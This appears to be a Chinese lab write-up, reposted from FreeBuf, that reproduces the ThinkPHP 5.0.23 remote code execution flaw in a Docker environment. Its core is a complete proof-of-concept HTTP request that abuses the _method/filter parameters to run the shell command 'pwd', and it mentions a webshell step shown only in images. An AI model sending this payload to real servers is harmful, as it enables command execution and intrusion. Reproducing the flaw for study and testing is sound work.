ThinkPHP 5.0.23 远程代码执行漏洞复现 – 作者:cloudcoll

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

1605075273_5fab8149cf27ada4b8a3c.png!small?1605075274879

访问页面     1605075285_5fab8155726e1d85d0620.png!small?1605075286503

二、漏洞利用

1、执行命令poc (复制所有代码改ip)

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.220.141:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 73

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

执行了命令pwd

1605075382_5fab81b62751607f83260.png!small?1605075383277

2、写一句话

1605075547_5fab825b8cb7121d0251d.png!small?16050755487281605076506_5fab861a00586823e2ad0.png!small?1605076506980

来源:freebuf.com 2020-11-11 14:37:12 by: cloudcoll

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论